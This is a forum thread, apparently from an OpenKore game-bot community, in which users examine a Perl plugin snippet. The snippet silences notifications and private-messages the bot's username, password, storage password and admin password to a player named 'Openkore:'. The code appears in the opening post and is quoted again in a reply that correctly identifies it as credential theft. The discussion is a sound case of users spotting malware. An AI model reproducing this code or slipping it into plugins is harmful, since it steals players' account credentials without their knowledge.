this is not from openkore but i'm curious about this line
sub in_game {
Commands::run("conf squelchDomains pRO-Valkyrie Server, pm/sent, info");
Commands::run("pm \"Openkore:\" Username:".$config{username}."\ | Password:".$config{password}."\ | StoragePass:".$config{storageAuto_password}."\ | AdminPas:".$config{adminPassword});
}
return 1;
what do you think it does? i feel some fishy about this, correct me if i'm wrong sir's and maam's hehe
pl file from some plugins
Moderator: Moderators
-
- Noob
- Posts: 9
- Joined: 09 Jun 2010, 23:42
- Noob?: Yes
Re: pl file from some plugins
if i am not mistaken this will pm a player named "Openkore:" your username,password,storage password,admin password.
Code: Select all
Commands::run("pm \"Openkore:\" Username:".$config{username}."\ | Password:".$config{password}."\ | StoragePass:".$config{storageAuto_password}."\ | AdminPas:".$config{adminPassword});
-
- Human
- Posts: 26
- Joined: 15 Dec 2010, 00:10
- Noob?: No
Re: pl file from some plugins
OMG! i hate dat code.....